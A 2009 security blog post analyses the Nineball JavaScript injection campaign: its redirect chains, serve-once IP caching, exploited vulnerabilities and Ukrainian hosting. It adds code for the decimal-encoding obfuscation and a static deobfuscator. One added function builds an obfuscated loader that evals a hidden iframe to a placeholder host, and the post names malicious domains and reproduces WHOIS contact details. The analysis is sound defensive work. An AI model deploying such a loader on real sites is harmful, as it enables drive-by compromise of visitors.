Nineball Injection Attack based in Russia
by Jago Maniscalchi // June 19, 2009 // Exploits and Malware // 1 Comment
Websense Threatseeker is reporting a new obfuscated Javascript injection attack, this time affecting up to 40,000 websites.
If a user visits one of the infected sites, they are redirected through a series of different sites owned by the attacker and brought to the final landing page containing the exploit code …. The final landing page records the visitor’s IP address. When visited for the first time, the user is directed to the exploit payload site. But when visited again from the same IP address, the user is directed to the benign site of ask.com.
Javascript Obfuscation
The attack uses dynamically generated obfuscated code that varies from page to page, so that signature-based AV products have nothing stable to match, although the deobfuscation routine itself is static. Unlike Gumblar, whose code was in URL-escaped format and was unescaped before execution, Nineball's obfuscated code is a sequence of decimal character codes that is decoded with the String.fromCharCode method.
Gumblar also replaced the % character with a dynamically selected (non-hex) character in an attempt to avoid detection of escaped Javascript. In a similar fashion, Nineball separates the decimal numbers of its obfuscated code with a chosen character, and the loader then splits on that same character to turn the blob into an array of decimals for decoding. Because the decoder is static, the payload can be recovered without executing the script: split on the separator and convert each number back to a character.
Websense are reporting that the malware exploits a number of patched vulnerabilities:
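As an added illustration of the decimal-with-separator encoding and the static String.fromCharCode decoding described above, the following is example code written for this page, not Nineball's own loader and not from the original post. The separator, the iframe payload and the example.invalid address are all constructed, and the static decoder learns the separator from the data rather than assuming one:

```javascript
// Added example (not Nineball's own loader): the decimal-with-separator
// obfuscation described above, the decoder the injected script runs, and a
// static decoder a defender can apply to a page without executing it.

const DECODE_CHUNK = 8192; // String.fromCharCode takes arguments, not an array

// Obfuscate: every character becomes its decimal code point, joined with a
// separator that the injected script later uses to split the blob.
function encodeDecimal(plain, sep) {
  const codes = [];
  for (let i = 0; i < plain.length; i++) codes.push(String(plain.charCodeAt(i)));
  return codes.join(sep);
}

// Deobfuscate the way the loader does: split on the separator, turn each
// element into a number and rebuild the string with String.fromCharCode.
function decodeDecimal(encoded, sep) {
  const codes = encoded.split(sep).filter((s) => s.length > 0).map(Number);
  if (codes.some((c) => !Number.isInteger(c) || c < 0 || c > 0xffff)) {
    throw new Error("not a well-formed decimal-encoded string");
  }
  let out = "";
  for (let i = 0; i < codes.length; i += DECODE_CHUNK) {
    out += String.fromCharCode.apply(null, codes.slice(i, i + DECODE_CHUNK));
  }
  return out;
}

// Constructed payload standing in for the injected iframe; example.invalid is
// a reserved placeholder, not a domain from the attack.
const SAMPLE_PAYLOAD =
  'document.write("<iframe src=\\"http://example.invalid/in.cgi?3\\" ' +
  'width=0 height=0></iframe>");';

// Build a loader in the shape the text describes: encoded blob, split on the
// separator, decoded with String.fromCharCode, handed to eval.
function buildSampleInjection(sep) {
  return (
    'var s="' + encodeDecimal(SAMPLE_PAYLOAD, sep) + '";' +
    'var a=s.split("' + sep + '");var o="";' +
    "for(var i=0;i<a.length;i++){o+=String.fromCharCode(a[i]);}eval(o);"
  );
}

// Static deobfuscation: find runs of at least minRun decimals joined by one
// repeated non-digit separator and decode each run without running anything.
// The separator is learned from the data (backreference \1), so a per-page
// choice of separator does not defeat the match.
function extractDecimalPayloads(script, minRun = 16) {
  const re = new RegExp(
    String.raw`\d{1,5}([^\d\s"'\\])(?:\d{1,5}\1){${minRun - 2},}\d{1,5}`,
    "g"
  );
  const found = [];
  for (const m of script.matchAll(re)) {
    const sep = m[1];
    try {
      found.push({ separator: sep, offset: m.index, decoded: decodeDecimal(m[0], sep) });
    } catch (e) {
      // a run that is not valid code points (e.g. a numeric table) is skipped
    }
  }
  return found;
}

// Run the static decoder over the constructed loader and report what it hid.
function analyzeSample(sep) {
  const script = buildSampleInjection(sep);
  return extractDecimalPayloads(script).map((p) => ({
    separator: p.separator,
    decoded: p.decoded,
    suspicious: /<iframe|eval\(|document\.write/i.test(p.decoded),
  }));
}

console.log(JSON.stringify(analyzeSample("~"), null, 2));
```

The regex deliberately does not hard-code a separator: the obfuscator picks one per page, so a detector keyed to a specific character would be as brittle as a signature on the blob itself.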
After redirection, the exploit payload site returns highly obfuscated malicious code. The malicious code attempts to exploit MS06-014 (targeting MDAC) and CVE-2006-5820 (targeting AOL SuperBuddy), as well as employing exploits targeting Acrobat Reader and QuickTime. The MS06-014 exploit code will download a Trojan dropper with low AV detection rate. This dropper drops a dll with the name SOCKET2.DLL to Windows’ system folder. This file is used to steal user information. The malicious PDF file, served by the exploit site, also has very low AV detection rate.
The Exploitation
On my first visit to the landing page http://rnw.kz/index.php I was redirected through a series of sites to a final page of http://stopssse.info/l.php?pbr which reported a 500 Internal Server Error.
Visiting the initial landing page a second time results in redirection via http://bro.tw/in.cgi?3 and http://rmi.tw/in.cgi?6 to the harmless search engine http://ask.com. Websense hypothesise that a cache of visitor IP addresses is maintained so that malicious content is never delivered to the same machine twice, which also frustrates repeat fetches by analysts.
A quick WHOIS examination of a few of these domain names shows them all registered to Russian individuals and hosted on a single IP – 91.212.65.133 – possibly located in Ukraine (a traceroute got as far as Russia and was then inconclusive).

Investigation of the IP hosting the first three domains using Robtex revealed a few more, including sovi.tw and molo.tw. These also redirect, through a series of other domains, to ask.com, indicating that they perhaps share the same cache of already-served IP addresses.
Redirections appear to be based partly on the domain and partly on the parameter passed to the in.cgi script. The diagram below illustrates the redirections that I managed to map out manually.

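The chains above were mapped by hand; the following is an added example, written for this page and not part of the original post, of a small redirect-chain mapper run against a constructed stand-in for the attacker's servers so that it works offline. The hop order rnw.kz to bro.tw to rmi.tw and the two end points (stopssse.info returning 500 on a first visit, ask.com afterwards) are taken from the text; that the first visit passes through the same bro.tw and rmi.tw hops is an assumption, since the post only names the end of that chain:

```javascript
// Added example, not from the original post: a redirect-chain mapper with
// loop detection, plus a constructed model of the attacker's servers that
// reproduces the per-IP "serve once" behaviour hypothesised in the text.

// Constructed server model. Hop targets are the ones named in the post; the
// per-IP cache is an assumption about how the observed behaviour is produced.
function makeAttackerServers() {
  const seenIps = new Set();
  const hops = {
    "http://rnw.kz/index.php": "http://bro.tw/in.cgi?3",
    "http://bro.tw/in.cgi?3": "http://rmi.tw/in.cgi?6",
  };
  const exploitPage = "http://stopssse.info/l.php?pbr"; // returned 500 in the post
  const benignPage = "http://ask.com/";

  // Behaves like a HEAD request: returns the status and Location header only.
  return function fetchHead(url, clientIp) {
    if (url === "http://rmi.tw/in.cgi?6") {
      const firstVisit = !seenIps.has(clientIp);
      seenIps.add(clientIp);
      return { status: 302, location: firstVisit ? exploitPage : benignPage };
    }
    if (url === exploitPage) return { status: 500, location: null };
    if (url in hops) return { status: 302, location: hops[url] };
    return { status: 200, location: null };
  };
}

// Follow 3xx Location headers from startUrl, recording every hop. Stops on a
// non-redirect, on a URL already in the chain (loop) or after maxHops.
function mapChain(fetchHead, startUrl, clientIp, maxHops = 10) {
  const chain = [new URL(startUrl).href];
  let res = fetchHead(chain[0], clientIp);
  let loop = false;
  let truncated = false;
  while (res.status >= 300 && res.status < 400 && res.location) {
    // Resolve relative Location values against the URL that issued them.
    const next = new URL(res.location, chain[chain.length - 1]).href;
    if (chain.includes(next)) { loop = true; break; }
    if (chain.length >= maxHops) { truncated = true; break; }
    chain.push(next);
    res = fetchHead(next, clientIp);
  }
  return { chain, finalStatus: res.status, loop, truncated };
}

// Demonstrate the serve-once behaviour: two visits from the same constructed
// address reach different end points, a fresh address sees the exploit page again.
function demo() {
  const servers = makeAttackerServers();
  const start = "http://rnw.kz/index.php";
  return {
    firstVisit: mapChain(servers, start, "192.0.2.10"),
    secondVisit: mapChain(servers, start, "192.0.2.10"),
    otherClient: mapChain(servers, start, "192.0.2.11"),
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

The practical point for an analyst is the one the post ran into: once an address has been served, re-fetching the chain from that address only ever shows the benign branch, so the first fetch must capture everything, or the next attempt has to come from a different address.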
With the exception of the end-page in the first chain investigated, all the domains associated with Nineball are hosted on the same IP and use dmdnssrv.info for DNS. This domain is also hosted on the same IP which is leased to Eurohost LLC:
inetnum: 91.212.65.0 - 91.212.65.255
netname: EUROHOST-NET
descr: Eurohost LLC
descr: Provider Local Registry
country: UA
remarks: ...

organisation: ORG-EL76-RIPE
org-name: Eurohost LLC
org-type: OTHER
descr: Eurohost LLC
address: off. 1, 81 Frunze str.,
address: Evpatoria, Crimea, Ukraine
phone: +38 093 584 20 07
abuse-mailbox: abuse@eurohost.biz.ua
e-mail: office@eurohost.biz.ua
admin-c: MI1858-RIPE
tech-c: NOC114-RIPE
mnt-by: EUROHOST-MNT
mnt-ref: EUROHOST-MNT
changed: noc@eurohost.biz.ua 20090611
source: RIPE

role: Network Operations Centre
address: Evpatoria, Crimea, Ukraine
address: off. 1, 81 Frunze str.,
e-mail: noc@eurohost.biz.ua
admin-c: MI1858-RIPE
tech-c: MI1858-RIPE
nic-hdl: NOC114-RIPE
changed: mk@eurohost.biz.ua 20090303
source: RIPE

person: Mikhail Ignatyev
address: off. 1, 81 Frunze str.,
phone: +38 093 584 20 07
address: Evpatoria, Crimea, Ukraine
nic-hdl: MI1858-RIPE
mnt-by: EUROHOST-MNT
changed: noc@eurohost.biz.ua 20090611
source: RIPE
Eurohost LLC, thought to be associated with the recently departed UralNet, have been collecting bad press recently. A large number of malicious servers are hosted in their /24 range (see malwaredomainlist.com). This comment is from the FireEye Malware Intelligence Lab, who incidentally have a screenshot of a Wireshark dump from March that appears to contain some Nineball-style obfuscated Javascript:
An AS that had been dormant (unrouted) for months came back online this week and immediately started hosting much of the malware that used to be on UralNet. They’ve only been back on the Bloc for a week, have a mere /24 (256 IPs), don’t have a corporate homepage, and yet, already have quite a few criminal customers.
and from wizcrafts.net:
Yesterday, April 30, 2009, when investigating a problem with an associate’s websites, I traced a cross site scripting iframe exploit, pointing to a malware middleman website at tojandglow.com, which redirects victims to a hostile server hosted in the Ukraine by Eurohost LLC. This Ukrainian server is currently dispensing malicious software that includes 9 Trojans, 7 scripting exploits and 1 virus.